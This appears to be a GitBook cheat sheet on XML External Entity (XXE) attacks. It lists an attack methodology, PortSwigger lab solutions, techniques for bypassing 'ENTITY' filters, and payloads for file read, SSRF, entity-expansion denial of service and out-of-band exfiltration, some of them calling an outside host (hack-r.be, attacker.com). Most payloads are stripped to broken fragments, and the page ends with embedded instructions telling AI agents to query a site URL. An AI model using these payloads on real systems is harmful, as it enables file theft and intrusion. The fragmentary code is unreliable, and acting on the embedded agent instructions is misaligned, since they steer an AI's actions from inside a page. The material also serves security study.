# XXE
## What is XXE (XML External Entity) Vulnerability?
**XML External Entity (XXE)** is a type of vulnerability that occurs when an application processes user-supplied XML data without properly validating it. In XML, the term **Entity** refers to a storage unit of data, which can be internal (within the XML document) or external (an external file or URL). An attacker can exploit XXE to:
* **Read arbitrary files** on the server (e.g., `/etc/passwd`).
* **Make requests** to internal systems (Server-Side Request Forgery, SSRF).
* **Cause denial of service** (DoS) by using large external entities.
* **Exfiltrate data** by sending sensitive information to an external entity controlled by the attacker.
**There are various types of XXE attacks:**
| XXE Attack Type | Description |
| -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ |
| Exploiting XXE to Retrieve Files | Where an external entity is defined containing the contents of a file, and returned in the application's response. |
| Exploiting XXE to Perform SSRF Attacks | Where an external entity is defined based on a URL to a back-end system. |
| Exploiting Blind XXE Exfiltrate Data Out-of-Band | Where sensitive data is transmitted from the application server to a system that the attacker controls. |
| Exploiting blind XXE to Retrieve Data Via Error Messages | Where the attacker can trigger a parsing error message containing sensitive data. |
> **Methodology** [whitechaitai](https://twitter.com/whitechaitai)
1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml".
2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
3. If svg allowed in picture upload , you can inject xml in svgs.
4. If the web app offers RSS feeds , add your milicious code into the RSS.
5. Fuzz for /soap api , some applications still running soap apis
6. If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
## Test Payload
#### Using private External Entity[#](https://trojand.com/cheatsheet/Web/XXE_Injection.html#using-private-external-entity)
```xml
]>
&cat;Jerry
```
#### Using a public External Entity[#](https://trojand.com/cheatsheet/Web/XXE_Injection.html#using-a-public-external-entity)
```xml
]>
&cat;Jerry
```
## CDATA
* [ ] XXE that can print XML files through the CDATA:
```xml
">
%dtd;
]>
&wrapper;FIRSTNAME_FILLER
```
* [ ] Inside the `wrapper.dtd` (the external DTD file)
* Its purpose is just to wrap the variables(parameters) into
```xml
```
## **Exploitation**
**LFI Test**
```xml
]>&xxe;
```
**Blind LFI test (when first case doesn't return anything)**
```xml
]>&blind;
```
**Access Control bypass (loading restricted resources - PHP example)**
```xml
]>
∾
```
**SSRF Test**
```xml
">]>&xxe;
```
**XEE (XML Entity Expansion - DOS)**
```xml
]>
&lol9;
```
**XEE #2 (Remote attack - through external xml inclusion)**
```xml
">]>
3..2..1...&test
```
**XXE FTP HTTP Server**
```xml
">
%remote;
%send;
]>
4
File stored on
">
%param1;
```
**XXE UTF-7**
```xml
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
To convert between UTF-8 & UTF-7 use recode. `recode UTF8..UTF7 payload-file.xml`
* [ ] [**Blind XXE with out-of-band interaction**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
**Exploit**
```jsx
]>
&xxe;1
```
* [ ] [**Exploiting blind XXE to exfiltrate data using a malicious external DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
**External DTD**
```jsx
">
%eval;
%exfil;
```
**Exploit**
```jsx
%xxe;]>
```
* [ ] [**Blind XXE with out-of-band interaction via XML parameter entities**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
**Exploit**
```xml
%xxe; ]>
```
* [ ] [**Exploiting blind XXE to retrieve data via error messages**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) **\[ DTD Blind Out-of-band ]**
> On the exploit server change the hosted file name to /exploit.dtd as the exploit file with Document Type Definition (DTD) extension, containing the following payload. The % is the Unicode hex character code for percent sign %. Parameter entities are referenced using the percent character instead of the usual ampersand.
```xml
">
%eval;
%exfil;
```
> Modify the file upload XML body of the request before sending to the target server.
```xml
%xxe;]>
Carl Toyotacarlos@hacked.net
```
* [ ] [**Exploiting XInclude to retrieve files**](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
> File upload or user import function on web target use XML file format. This can be vulnerable to XML external entity (XXE) injection.
**Identify XML**
> Possible to find XXE attack surface in requests that do not contain any XML.
> To Identify XXE in not so obvious parameters or requests, require adding the below and URL encode the & ampersand symbol to see the response.
`%26entity;`
> Below the server respond with **indication that XML Entities are not allowed for security reasons.**
```xml
URL encode the XXE payload before sending.
```
* [ ] [PortSwigger Lab: Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
**XXE via SVG Image upload**
> Identify image upload on the blog post function that accept svg images, and observe that the avatars already on blog source code is svg extensions.
> The content of the image.svg file uploaded:
```xml
]>
```
!
* [ ] [**Exploiting XXE to retrieve data by repurposing a local DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
> Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso.`
```xml
">
%eval;
%error;
'>
%local_dtd;
]>
```
**XML External Entity (XXE) Injection Payloads**
**XXE: Basic XML Example**
```xml
JohnDoe
```
**XXE: Entity Example**
```xml
]>
John&example;
```
**XXE: File Disclosure**
```xml
]>
John&ent;
```
**XXE: Denial-of-Service Example**
```xml
&lol9;
```
**XXE: Local File Inclusion Example**
```xml
]>&xxe;
```
**XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)**
```xml
]>&blind;
```
**XXE: Access Control Bypass (Loading Restricted Resources - PHP example)**
```xml
]>
∾
```
**XXE:SSRF ( Server Side Request Forgery ) Example**
```xml
">]>&xxe;
```
**XXE: (Remote Attack - Through External Xml Inclusion) Exmaple**
```xml
">]>
3..2..1...&test
```
**XXE: UTF-7 Exmaple**
```
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
**XXE: Base64 Encoded**
```xml
%init; ]>
```
**XXE: XXE inside SOAP Example**
```xml
"> %dtd;]>]]>
```
**XXE: XXE inside SVG**
```svg
```
## Bypassing Filters that Block "ENTITY":
If a web application is filtering or blocking the word "ENTITY" to prevent XXE attacks, there are several **bypass techniques** you can try:
**1. Case Manipulation:**
* Some filters are case-sensitive and may only block the exact string `ENTITY` in uppercase. You can try different cases, such as:
```xml
]>
```
Test variations like:
* ``
* ``
**2. Use Parameter Entities:**
* Instead of defining an external entity directly, you can use **parameter entities** (which start with `%`) to indirectly reference the malicious entity:
```xml
%dtd;
]>
&xxe;
```
The malicious `.dtd` file hosted on `attacker.com` could contain the payload for reading a file.
**3. Hex Encoding:**
* Sometimes, filters may miss encoded characters. You can try encoding the word `ENTITY` using its **hexadecimal** or **decimal** representation in XML:
```xml
]>
```
This encodes "ENTITY" in decimal (69 for 'E', 78 for 'N', etc.). In hex, it would be ``.
**4. Using DTD Chaining:**
* If you have control over external DTDs, you can chain DTDs to bypass filters. This involves referencing a remote DTD file hosted by the attacker:
```xml
%remote;
]>
```
The external DTD file (`external.dtd`) can define the malicious entity, bypassing local filters.
**5. XML Comments:**
* Sometimes filters miss entities hidden inside XML comments. You can obfuscate the payload by breaking the word `ENTITY` into parts:
```xml
-->
]>
```
**6. Base64 Encoding:**
* You might be able to encode the payload and then decode it at runtime. Some parsers allow you to inject **base64-encoded** external entities and decode them:
```xml
]>
&xxe;
```
This base64 string decodes to `/etc/passwd`.
**7. Alternative External Sources (e.g., `SYSTEM` or `PUBLIC`):**
* Instead of using `ENTITY`, try to reference external files or URLs using alternative methods. For example:
```xml
```
Here, the external DTD contains the payload, and you avoid using the `ENTITY` keyword.
## Mitigation:
From a defensive perspective, to mitigate XXE attacks:
* Disable **external entity processing** in XML parsers where it's not needed.
* Use **whitelisting** for acceptable file or URL references in XML files.
* Implement **input validation** to ensure only valid, trusted XML is processed.
* Ensure your application is updated to use parsers that are not vulnerable to XXE by default.
## **References :**
👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_\(XXE\)_Processing)
👉 [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
👉 [Testing for XML Injection (OTG-INPVAL-008)](https://www.owasp.org/index.php/Testing_for_XML_Injection_\(OTG-INPVAL-008\))
## Top XXE reports from HackerOne:
1. [XXE at ecjobs.starbucks.com.cn/retail/hxpublic\_v6/hxdynamicpage6.aspx](https://hackerone.com/reports/500515) to Starbucks - 308 upvotes, $4000
2. [XXE on pulse.mail.ru](https://hackerone.com/reports/505947) to Mail.ru - 263 upvotes, $6000
3. [XXE on sms-be-vip.twitter.com in SXMP Processor](https://hackerone.com/reports/248668) to Twitter - 250 upvotes, $10080
4. [XXE on https://duckduckgo.com](https://hackerone.com/reports/483774) to DuckDuckGo - 209 upvotes, $0
5. [Phone Call to XXE via Interactive Voice Response](https://hackerone.com/reports/395296) to ██████ - 170 upvotes, $0
6. [Partial bypass of #483774 with Blind XXE on https://duckduckgo.com](https://hackerone.com/reports/486732) to DuckDuckGo - 151 upvotes, $0
7. [Multiple endpoints are vulnerable to XML External Entity injection (XXE) ](https://hackerone.com/reports/72272)to Pornhub - 136 upvotes, $2500
8. [XXE through injection of a payload in the XMP metadata of a JPEG file](https://hackerone.com/reports/836877) to Informatica - 128 upvotes, $0
9. [XXE Injection through SVG image upload leads to SSRF](https://hackerone.com/reports/897244) to Zivver - 111 upvotes, $0
10. [XXE in Site Audit function exposing file and directory contents](https://hackerone.com/reports/312543) to Semrush - 99 upvotes, $2000
11. [\[RCE\] Unserialize to XXE - file disclosure on ams.upload.pornhub.com](https://hackerone.com/reports/142562) to Pornhub - 89 upvotes, $10000
12. [XXE in DoD website that may lead to RCE](https://hackerone.com/reports/227880) to U.S. Dept Of Defense - 89 upvotes, $0
13. [Blind XXE via Powerpoint files](https://hackerone.com/reports/334488) to Open-Xchange - 86 upvotes, $2000
14. [blind XXE in autodiscover parser](https://hackerone.com/reports/315837) to Mail.ru - 70 upvotes, $5000
15. [LFI and SSRF via XXE in emblem editor](https://hackerone.com/reports/347139) to Rockstar Games - 68 upvotes, $1500
16. [Blind OOB XXE At "http://ubermovement.com/"](https://hackerone.com/reports/154096) to Uber - 55 upvotes, $500
17. [XXE на webdav.mail.ru - PROPFIND/PROPPATCH](https://hackerone.com/reports/758978) to Mail.ru - 54 upvotes, $10000
18. [XXE on ██████████ by bypassing WAF ████](https://hackerone.com/reports/433996) to QIWI - 53 upvotes, $5000
19. [\[rev-app.informatica.com\] - XXE](https://hackerone.com/reports/105434) to Informatica - 44 upvotes, $0
20. [RCE via Local File Read -> php unserialization-> XXE -> unpickling](https://hackerone.com/reports/415501) to h1-5411-CTF - 43 upvotes, $0
21. [XML External Entity (XXE) in qiwi.com + waf bypass](https://hackerone.com/reports/99279) to QIWI - 39 upvotes, $3137
22. [Authenticated XXE](https://hackerone.com/reports/1095645) to WordPress - 39 upvotes, $600
23. [XML Parser Bug: XXE over which leads to RCE](https://hackerone.com/reports/55431) to drchrono - 32 upvotes, $700
24. [XXE on DoD web server](https://hackerone.com/reports/188743) to U.S. Dept Of Defense - 31 upvotes, $0
25. [Singapore - XXE at https://www.starbucks.com.sg/RestApi/soap11](https://hackerone.com/reports/762251) to Starbucks - 28 upvotes, $500
26. [\[app.informaticaondemand.com\] XXE](https://hackerone.com/reports/105753) to Informatica - 24 upvotes, $0
27. [Blind XXE on my.mail.ru](https://hackerone.com/reports/276276) to Mail.ru - 23 upvotes, $800
28. [Non-production Open Database In Combination With XXE Leads To SSRF](https://hackerone.com/reports/742808) to Evernote - 23 upvotes, $0
29. [XXE in upload file feature](https://hackerone.com/reports/105787) to Informatica - 21 upvotes, $0
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://sallam.gitbook.io/sec-88/web-appsec/xxe.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.